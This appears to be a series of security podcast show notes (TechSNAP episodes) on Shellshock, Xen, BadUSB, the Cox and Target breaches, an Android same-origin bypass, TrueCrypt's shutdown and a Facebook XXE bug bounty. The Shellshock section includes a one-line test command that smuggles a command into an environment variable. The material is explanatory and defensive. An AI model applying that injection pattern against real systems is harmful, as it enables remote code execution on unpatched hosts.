• Funny post over at OpenBSD misc@ mailing list: User doesn’t quite understand how bash vulnerability checks work
• Marriott fined $600K by FCC for Wi-Fi blocking scam – Android Authority
• Defense contractor Raytheon gets patent for ‘smart mouse’ technology, based on smart grip technology for guns, authenticate the user by the way they hold their mouse
• Popular electricity smart meters in Spain can be hacked, researchers say
• Backblaze updates Drive Reliability numbers, still lacking some detail
• SQL Injection Vulnerability in ‘Yahoo! Contributors Network’
• JPMorgan Chase breach exposes data on 83 million customers. No credit card or social security data was taken. However, security experts remain skeptical that this breach is as low-impact as the bank is suggestion

The post Belkin Heartbeat Stops | TechSNAP 183 first appeared on Jupiter Broadcasting.

Recent major flaws found in in critical open source software have sent the Internet into a panic. From Shellshock to Xen we’ll discuss how these vulnerabilities can be chained together to own a box.

Plus how secure are VLANs, a big batch of your questions, our answers, and much much more!

Thanks to:

Become a supporter on Patreon:

— Show Notes: —

Bash plus Xen bug send the entire internet scrambling

• A critical flaw was discovered in the bash shell, used as the default system shell in most versions of linux, as well as OS X.
• The flaw was with the parsing of environment variables. If a new variable was set to contain a function, if that function was followed by a semi-colon (normally a separator that can be used to chain multiple commands together), the code after the semicolon would be be executed when the shell started
• Many people are not aware, that CGI scripts pass the original request data, as well as all HTTP headers to the scripts via environment variables
• After those using bash CGI scripts ran around with chickens with their heads cut off, others came to realize that even if the CGI scripts are actually perl or something else, if they happen to fork a shell with the system() call, or similar, to do something, that shell will inherit those environment variables, and be vulnerable
• As more people spent brain cycles thinking of creative ways to exploit this bug, it was realized that even qmail was vulnerable in some cases, if a user has a .qmail file or similar to forward their email via a pipe, that command is executed via the system shell, with environment variables containing the email headers, including from, to, subject etc
• While FreeBSD does not ship with bash by default, it is a common dependency of most of the desktop environments, including gnome and KDE. PCBSD also makes bash available to users, to make life easier to linux switchers. FreeNAS uses bash for its interactive web shell for the same reason. While not vulnerable in most cases, all have been updated to ensure that some new creative way to exploit the bug does not crop up
• Apparently the DHCP client in Mac OS X also uses bash, and a malicious DHCP server could exploit the flaw
• The flaw also affects a number of VMWare products
• OpenVPN and many other software packages have also been found to be vulnerable
• The version of bash on your system can be tested easily with this one-liner:
  env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
• Which will print “this is a test”, and if bash has not yet been patched, will first print ‘vulnerable’
• ArsTechnica: Bug in bash shell creates big security hole on anything with linux in it
• Concern over bash bug grows as it is actively exploited in the wild
• First bash patch doesn’t solve problem, second patch rushed out to resolve issue
• Now that people are looking, even more bugs in bash found and fixed
• Shellshock fixes result in another round of patches as attacks get more clever
• Apple releases patch for shellshock bug
• There were also a critical update to NSS (the Mozilla cryptographic library, which was not properly validating SSL certificates)
• The other big patch this week was for Xen
• It was announced by a number of public cloud providers, including Amazon and Rackspace, that some virtual server host machines would need to be rebooted to install security fixes, resulting in downtime for 10% of Amazon instances
• It is not clear why this could not be resolved by live migrations
• All versions of Xen since 4.1 until this patch are vulnerable. The flaw is only exploitable when running fully virtualized guests (HVM mode, uses the processor virtualization features), and can not be exploited by virtual machines running in the older paravirtualization mode. Xen on ARM is not affected
• Xen Security Advisory
• Amazon Blog Post #1
• Amazon Blog Post #2
• Rackspace Blog Post
• Additional Coverage: eweek

Cox Communications takes the privacy of its customers seriously, kind of

• A female employee of Cox Communications (a large US ISP) was socially engineered into giving up her username and password
• These credentials were then used to access the private data of Cox Customers
• The attacker apparently only stole data about 52 customers, one of which was Brian Krebs
• This makes it sound like a targeted attack, or at least an attacker by someone who is (or is not) a fan of Brian Krebs
• It appears that the Cox internal customer database can be accessed directly from the internet, with only a username and password
• Cox says they use two factor authentication “in some cases”, and plan to expand the use of 2FA in the wake of this breach
• Cox being able to quickly determine exactly how many customers’ data was compromised suggests they atleast have some form of auditing in place, to leave a trail describing what data was accessed
• Brian points out: “This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.” “Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach. Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.”

Other researches recreate the BadUSB exploit and release the code on Github

• The “BadUSB” research was originally done by Karsten Nohl and Jakob Lell, at SR Labs in Germany.
• Presented at BlackHat, it described being able to reprogram the firmware of USB devices to perform other functions, such as a USB memory stick that presented itself to the computer as a keyboard, and typed out commands once plugged in, allowing it to compromise the computer and exfiltrate data
• Brandon Wilson and Adam Caudill were doing their own work in this space, and when they heard about the talk at BlackHat, decided to accelerate their own work
• They have now posted their code on Github
• “The problem is that Nohl and Lell—and Caudill and Wilson—have not exploited vulnerabilities in USB. They’re just taking advantage of weaknesses in the manner in which USBs are supposed to behave“
• “At Derby Con, they were able to demonstrate their attack with the device pretending to be a keyboard that typed out a predetermined script once it was plugged into the host computer. They also showed another demo where they had a hidden partition on a flash drive that was not detected by the host PC“
• “It’s undetectable while it’s happening,” Wilson said. “The PC has no way of determining the difference. The way a PC determines the type of device all happens through the USB and code on the other device. Our ability to control that code means you cannot trust anything a USB device tells you.”
• The way around this issue would be for device manufacturers to implement code signing
• The existing firmware would only allow the firmware to be updated if the new firmware was signed by the manufacturer, preventing a malicious users from overwriting the good firmware with ‘bad’ firmware
• However, users could obviously create their own devices specifically for the purpose of the evil firmware, but it would prevent the case where an attack modifies your device to work against you
• At the same time, many users might argue against losing control over their device, and no longer being able to update the firmware if they wish
• The real solution may be for Operating Systems and users to evolve to no longer trust random USB devices, and instead allow the user to decide if they trust the device, possibly something similar to mobile apps, where the OS tells the user what functionality the device is trying to present
• You might choose to not trust that USB memstick that is also attempting to present a network adapter, in order to override your DHCP settings and make your system use a set of rogue DNS servers

Feedback:

• GroffTheBSDGoat

• [Suggestion] Is it possible to enable https on www.jupiterbroadcasting.com?

• I need a cli encryption tool

• Security of a VLAN?

• Weird emails delivered to wildcard mailbox

• Bash Shellshock vs SSH

• Is open source better?

Round Up:

• Chinese iOS Trojan Targets Jailbroken iPhones Used by Hong Kong Protesters
• The science of network troubleshooting
• GitHub.com blacklisted in Russia as of today
• TheSecuritySetup.com profiles H. D. Moore’s setup
• An FBI informant led hacks against 30 countries—now we know which ones
• How hackers accidentally sold a homemade pre-release XBox One to the FBI
• LibreSSL: More Than 30 Days Later
• Cross site scripting vulnerability at eBay has existed since atleast February, redirected users to password harvesting sites and other malicious links which clicking on auction listings
• OpenVPN vulnerable to Shellshock Bash vulnerability
• Large advertising network Zedo found serving malware infected advertisements, including via Google’s DoubleClick advertising service, affected large sites including Last.fm
• The Open Technology Fund (backed by Google, Dropbox and others) is attempting to team User Interface Designers with Security Experts to design new security and cryptography tools that are easy to use
• Why parts of the internet stopped working – A small company accidently started announcing the entire internet routing table it received from one of its upstreams via its second upstream provider, causing large swaths of the internet to be routed via their connection
• Second same-origin policy bypass flaw in Android Browser

The post Xen Gets bashed | TechSNAP 182 first appeared on Jupiter Broadcasting.

We’ll tell you about a major German hack that lasted 12 years, and struck over 300 business. Plus researchers discover a nasty Android bug that impacts over 70% of users.

Then it’s a great big batch of your networking questions, our answers & much much more!

Thanks to:

Become a supporter on Patreon:

— Show Notes: —

Operation Harkonnen, a 12 year long intrusion to over 300 businesses

• “From 2002 a German cybercrime network performed numerous targeted penetrations to over 300 organizations, including tier one commercial companies, government institutions, research laboratories and critical infrastructure facilities in the German speaking countries. The attackers planted Trojans in specific workstations in the organizations, gained access to sensitive confidential documents and information and silently exfiltrating them to the organizations who ordered the attack”
• “Once embedded in the system the files started to send data from the target computer to an external domain. The analysis revealed the domain was registered by a UK company, with the exact address and contact details of 833 other companies, most of which are already dissolved”
• “The British relatively tolerant requirements to purchasing SSL security certificates were exploited by the network to create pseudo legitimate Internet service names and to use them to camouflage their fraudulent activity”
• Specifically, it is quite easy to establish a new company in England
• It is estimated that the attackers spent as much as $150,000 establishing fake companies, and arming them with domains and SSL certificates in order to make their spear-phishing campaign appear more legitimate
• “The discovery happened at a leading, 30 year old, 300 employees’ German organization that holds extremely sensitive information with a strategic value to many adverse organizations and countries. The organizational network contains 5 domains with complex architecture of multiple network segments and sites, connected through VPN.“
• Additional Coverage: TheHackerNews

Researcher finds same-origin-policy bypass for Android browser, allows attacker to read your browser tabs

• Android versions before 4.4 (75% of all current Android phones) are vulnerable
• CVE-2014-6041, and was disclosed on September 1, 2014 by Rafay Baloch on his blog.
• By malforming a javascript: URL handler with a prepended null byte, an attacker can avoid the Android Open Source Platform (AOSP) Browser’s Same-Origin Policy (SOP) browser security control.
• What this means is, any arbitrary website (say, one controlled by a spammer or a spy) can peek into the contents of any other web page.
• The attacker could scrape your e-mail data and see what your browser sees.
• Or snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.
• As part of its attempts to gain more control over Android, Google has discontinued the AOSP Browser.
• Android Browser used to be the default browser on Google, but this changed in Android 4.2, when Google switched to Chrome.
• The core parts of Android Browser were still used to power embedded Web view controls within applications, this changed in Android 4.4, when it switched to a Chromium-based browser engine.
• Users of Android 4.0 and up can avoid much of the exposure by switching to Chrome, Firefox, or Opera, none of which should use the broken code.
• Update: Google has offered the following statement:

We have reviewed this report and Android users running Chrome as their browser, or those who are on Android 4.4+ are not affected. For earlier versions of Android, we have already released patches (1, 2) to AOSP.

• Additional Coverage: ThreatPost
• Additional Coverage: Rapid7, includes metasploit module

Feedback:

• Where do you Apply Network Qos?

• Where are packets going?

• Double Trouble NAT

• Unsafe internet of things (IoT) devices

Round Up:

• Yet Another Reason Containers Don’t Contain: Kernel Keyrings
• Micron announces new 16nm SSD chips, only $0.45/GB, dynamically programmable as SLC or MLC
• What Exactly Is the Facebook Messenger App for iOS Tracking?
• Citadel banking trojan repurposed in attack against middle eastern oil companies
• Apple’s “warrant canary” disappears, suggesting new Patriot Act demands
• Details emerge about Home Depot hack, malware attempted to look like McAfee PoS protection system, looks like different attackers than Target
• The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) disclosed four different remotely exploitable vulnerabilities in IntegraXor, a popular SCADA server
  

The post Bait and Phish | TechSNAP 181 first appeared on Jupiter Broadcasting.

The TrueCrypt project has shut down, and we’ll run down what we think is the most likely answer to this sudden mystery is.

Plus the good news for openSSL, the top 10 Windows configuration mistakes, and big batch of your questions, our answers, and much much more!

Thanks to:

— Show Notes: —

TrueCrypt shuts down unexpectedly

• TrueCrypt is a cross-platform image or whole disk encryption system
• The website for TrueCrypt changed yesterday, stating that “it may contain unfixed security issues”
• The page states now that Windows XP is EOL and all supported versions of Windows support ‘BitLocker’ disk encryption, TrueCrypt is no longer necessary
• The website provides information about transitioning data from TrueCrypt to the OS disk encryption system for various different OSs
• The website has been updated with version 7.2 of TrueCrypt, which only allows the user to decrypt their files, not encrypt any new files
• This was originally thought to be a hack of the site, or a hoax
• The new binary is signed with the correct key, the same as previous versions of TrueCrypt, suggesting that this post is legitimate
• While the code is available, the license is restrictive
• The developers of TrueCrypt are anonymous
• GIST tracking various bits of information and speculating about possible causes
• ThreatPost coverage
• One of the suspicious things about the announcement is the recommendation to use BitLocker, the authors of TrueCrypt had previously expressed concerns about how BitLocker stores the secret keys in the TPM (Trusted Platform Module), which may also allow the NSA to access the secret key
• There is some speculation that this could be a ‘warrant canary’, the authors’ way to telling the public that they were forced to do something to TrueCrypt, or divulge something about TrueCrypt
• However, it is more likely that the developers just no longer have an interest in maintaining TrueCrypt
• The last major version release was 3 years ago, and the most recent release before the announcement was over a year ago. An actively developed project would likely have had at least some maintenance releases in that time
• The code for TrueCrypt was being audited after a crowdfunding effort. The first phase of the audit found no obvious backdoors, but the actual cryptography had not been analyzed yet.
• Additional Coverage – Krebs On Security

Core Infrastructure Initiative provides OpenSSL with 2 full time developers and funds a security audit

• The CII has announced its Advisory board and the list of projects it is going to support
• Advisory Board members include:
• longtime Linux kernel developer and open source advocate Alan Cox
• Matt Green of Open Crypto Audit Project
• Dan Meredith of the Radio Free Asia’s Open Technology Fund
• Eben Moglen of Software Freedom Law Center
• Bruce Schneier of the Berkman Center for Internet & Society at Harvard Law School
• Eric Sears of the MacArthur Foundation
• Ted T’so of Google and the Linux kernel community
• Projects identified as core infrastructure:
• Network Time Protocol
• OpenSSH
• OpenSSL
• Open Crypto Audit Project to conduct security audit of OpenSSL
• The security audit will be difficult due to the lack of a consistent style in the code and the maze of ifdef and ifndef segments
• the OCAP (Open Crypto Audit Project) team, which includes Johns Hopkins professor and cryptographer Matthew Green and Kenn White, will now have the money to fund an audit of OpenSSL
• OCAP was originally created by a crowdfunded project to audit TrueCrypt

The top 10 windows server security misconfigurations

• NCCGroup does what it calls ‘Build Surveys’, where they check production environments to ensure they are configured properly
• The following is the result of an analysis of their last 50 such surveys:
  • Missing Microsoft Patches: 82%
  • Insufficient Auditing: 50%
  • Third-Party Software Updates: 48%
  • Weak Password Policy: 38%
  • UAC Disabled for Administrator Account: 34%
  • Disabled Host-Based Firewall: 34%
  • Clear Text Passwords and Other Sensitive Information: 24%
  • Account Lockout Disabled: 20%
  • Out-of-Date Virus Definitions: 18%
  • No Antivirus Installed: 12%
• Conclusions: Everyone makes the same mistakes, over and over
• Most of these problems are trivial to fix
• Part of the problem is this culture of ‘patch averseness’, partly this is the fault of software vendors often issuing patches that break more things than they fix, but in general Microsoft has actually done a good job of ensuring their patches apply smoothly and do not break things
• Part of this is the fact that they only issue updates once a month, and only once they have been tested
• In the study, most of the machines that were missing patches, were missing patches that were more than a year old, so it isn’t just conservatism, but just a complete lack of proper patch management

Feedback:

• FreeBSD Developers Summit

• BSDCan 2014 videos

• Replacing failed disk in Freenas

• Am I too old?

• Bacula Retention and Storage Guidance

• VLAN Tag You\’re It

• Virtualisation as a Work LAN Solution

• devops is specialization

• DevOps – Wikipedia, the free encyclopedia

• Can you please talk about load balancing?

• Update on me not getting a job.

Round-Up:

• DISH Teams Up with Coinbase to Become Largest Company to Accept Bitcoin
• Post Mortem at Joyent — Opps, I accidently rebooted every server in the data center at once
• Official Google Blog: Getting to work on diversity at Google
• PeakScale’s list of PostMortems from all around the web
• YouTube starts rating U.S. ISPs, puts its weight behind settlement-free peering
• Why you don’t want to use AES-XTS encryption for anything except FDE
• Apple Forgets to Renew SSL Certificate, Breaking OS X Software Update [Fixed]
• Security concerns about HTTP/2.0 — rushing to finish and cutting corners
• Separate from the recent eBay hack, an XSS vulnerability that has not been fixed
• Last night on IRC to topic changes to VGA, and Peter Wemm dug out his old dual cpu Pentium 90mhz running FreeBSD
• Windows XP hack to get updates — Not a great idea

The post Tales from the TrueCrypt | TechSNAP 164 first appeared on Jupiter Broadcasting.

Facebook just paid out their biggest bug bounty yet, we’ll tell you about the flaw was so major it warranted a $33k bounty. Plus it’s been a bad week for Chrome security…

Then it’s a big batch of your questions, our answers, and much much more!

Thanks to:

— Show Notes: —

Facebook pays out biggest bug bounty ever, $33,500 after researcher gets ‘keys to the kingdom’

• Reginaldo Silva, a Brazilian security researcher, found a remote execution flaw in Facebook and was able to perform various functions including coping the /etc/passwd file, getting him a list of the users that exist on the system, and could have changed the URL for the Google OpenID provider, in order to execute MitM attacks on users logging in to Facebook using their Gmail accounts
• The original flaw was found in September 2012, when the researcher discovered an XXE (XML External Entity) bug in a Drupal blogs OpenID provider
• After finding the flaw in OpenID, he tried the attack successfully against StackExchange
• Later he also tried it against Google, while it worked, he was not able to read any files or make any network connections. For this he received his first bug bounty, $500 from Google
• During the original investigation, he could not find a valid Facebook OpenID endpoint
• Some time later, while investigating the Facebook password reset system, he discovered they still used OpenID for Gmail users to reset their passwords
• Using the newly discovered endpoint, he still was not able to launch his attack, because Facebook only communicated with Google, and for the attack to work he needed to communicate with his malicious OpenID provider
• After more reading of the OpenID spec, he found what he was looking for and was able to cause Facebook to contact his server, parse his malicious XML and cause Facebook’s servers to run code of his choosing
• From this he was able to get a copy of the /etc/passwd from the server
• Researcher’s Blog Post
• Facebook Security Team Blog Post
• Facebook Extends Bug Bounty Program

Security companies remove information about target breach from the Internet

• One we had previously covered:
• “On Dec. 18, a malicious software sample was submitted to ThreatExpert.com, a Symantec-owned service. But the public report the service generated vanished. “
• However, as is often the case with the internet, someone (Krebs ftw) had a copy of the report and posted it
• “iSight Partners, a Dallas-based cybersecurity company that is working with the U.S. Secret Service, published a series of questions and answers on its website related to the attacks on point-of-sale devices at U.S retailers. That too vanished on Thursday.”
• “Intel-owned McAfee redacted on Tuesday a blog post from last week that contained technical detail similar to the ThreatExpert.com report”
• When queried, a Symantec spokeswoman said “we took the initiative to remove it because we didn’t want the information to compromise the ongoing investigation.”
• Alex Holden, founder of Hold Security, who worked with Brian Krebs on the Adobe breach, said it was the right move for Symantec to pull the report, as attackers might have been able to use the information to compromise other point-of-sale devices at other retailers
• “I was surprised that this information was posted on the Internet in the first place,” Holden said. “Besides having a Target machine’s name and its IP address, system structure and drive mapping, it discloses a very vital set of credentials setup specifically for exploitation of the device.”
• As many as six other U.S. companies are believed to be victims of point-of-sale related attacks, where malware intercepts unencrypted card details. So far, only Target and high-end retailer Neiman Marcus have acknowledged the attacks.

Adware vendors buy Chrome Extensions to send ad- and malware-filled updates

• While Chrome itself is updated automatically by Google, that update process also includes Chrome’s extensions, which are updated by the extension owners.
• This means that it’s up to the user to decide if the owner of an extension is trustworthy or not, since you are basically giving them permission to push new code out to your browser whenever they feel like it.
• Ownership of a Chrome extension can be transferred to another party, and users are never informed when an ownership change happens.
• Malware and adware vendors have caught wind of this and have started showing up at the doors of extension authors, looking to buy their extensions.
• Once the deal is done and the ownership of the extension is transferred, the new owners can issue an ad-filled update over Chrome’s update service, which sends the adware out to every user of that extension.
• A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the “Add to Feedly” extension.
• One morning, the extension author got an e-mail offering “4 figures” for the sale of his Chrome extension. The extension was only about an hour’s worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.
• A month later, the new extension owners released their first (and so far only) update, which injected adware on all webpages and started redirecting links.
• This isn’t a one-time event, either. About a month ago, I had a very simple Chrome extension called “Tweet This Page” suddenly transform into an ad-injecting machine and start hijacking Google searches.
• Google has stated that Chrome’s extension policy is due to change in June 2014. The new policy will require extensions to serve a single purpose.
• Chromium Blog: Keeping Chrome Extensions Simple

• FauxShow Sticker Awards

Feedback:

• Allan’s home network setup
  • VLAN A – Home network (upstairs), plus hidden WiFi SSID, only has access to personal ZFS server
  • VLAN B – Office network, WiFi, connections machines work
  • VLAN C – Management network, switches, IPMI, PDUs etc
  • VLAN D – Guest Wireless
  • VLAN E – DMZ for servers
  • Personal ZFS server has separate interfaces on VLAN A and B
  • FreeBSD PF Firewall is only machine that can route between the VLANs
  • DMZ is not used yet, will be once 1000mbps unmetered Fibre connection arrives
  • Gear Used: Netgear GS724T 24port gig-e switch.
• Dropbox De-dupe BS
  • How Tarsnap Works
• Authentication for Linux
• IBM SMartCloud Mini War Story
• jupiterbroadcasting on Instagram
• BSD Now tutorial contest, win a hand-made FreeBSD Pillow

Round Up:

• Network Solutions, the original domain name registrar, appears to be automatically enrolling customers in a $1850/year “WebLock Security Service”, you must call to opt-out
• FreeBSD 10.0-RELEASE Announcement
• Developer finds Chrome eavesdropping bug
• Target restarts push for Chip&Pin protected cards (Common in Europe and Canada) after failed adoption 10 years ago
• IBM says goodbye to x86 forever, sells server lines to Lenovo
• Backblaze publishes reliability numbers of different models of hard drive
• The Most (and Least) Reliable Hard Drive Brands
• Researchers tell Congess Healthcare.gov is insecure, researchers able to get 70,000 records in only 4 minutes
• Kids, this is story of How I Met… my VPS hacked.
• 16 Million German users infected with malware that steals passwords, email addresses and other sensitive data
• More from last week, a Documentary on the first trans-atlantic telephone cable
• How a DNS query works Get DNSMadeEasy Hosting
• EasyDNS wins case and blocks London Police takedown order, domain transered

The post Tarnished Chrome | TechSNAP 146 first appeared on Jupiter Broadcasting.